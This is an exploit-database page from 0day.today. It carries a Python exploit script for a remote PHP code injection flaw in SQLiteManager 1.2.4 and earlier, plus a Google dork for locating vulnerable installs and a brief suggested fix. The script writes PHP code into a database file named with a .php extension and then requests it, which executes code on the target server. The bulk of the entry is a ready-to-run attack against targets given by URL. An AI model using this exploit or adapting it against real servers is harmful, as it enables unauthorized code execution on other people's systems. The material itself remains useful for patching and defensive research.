0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

SQLiteManager 1.2.4 Remote PHP Code Injection Vulnerability

Author

RealGame

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
 
import re
import urllib2
from urllib import urlencode
from sys import argv, exit

def strip_tags(value):
    #Strip tags with RegEx
    return re.sub('<[^>]*?>', '', value)

def getDbId(sqliteUrl, myDbName):
    #Find Components
    htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Make a dict of stripped columns
        for element in td: 
            if strip_tags(element) == myDbName:
                #Return Id
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None

def main():
    print \
        'SQLiteManager Exploit\n' + \
        'Made By RealGame\n' + \
        'http://www.RealGame.co.il\n'
    
    if len(argv) < 2:
        #replace('\\', '/') - To Do The Same In Win And Linux
        filename = argv[0].replace('\\', '/').split('/')[-1]
        
        print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
        exit()
    
    sqliteUrl = argv[1]     
    myDbName  = "phpinfo"
    myDbFile  = "phpinfo.php"
    #Create Database
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
    #Get Database ID
    dbId = getDbId(sqliteUrl + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                      'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}
        urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
        #Inject Code
        urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
        #Remove Database
        urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
        print 'Succeed'
        return
        
    print 'Failed'

if __name__ == '__main__':
    main()

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

SQLiteManager 1.2.4 Remote PHP Code Injection Vulnerability

Report Error

Report Error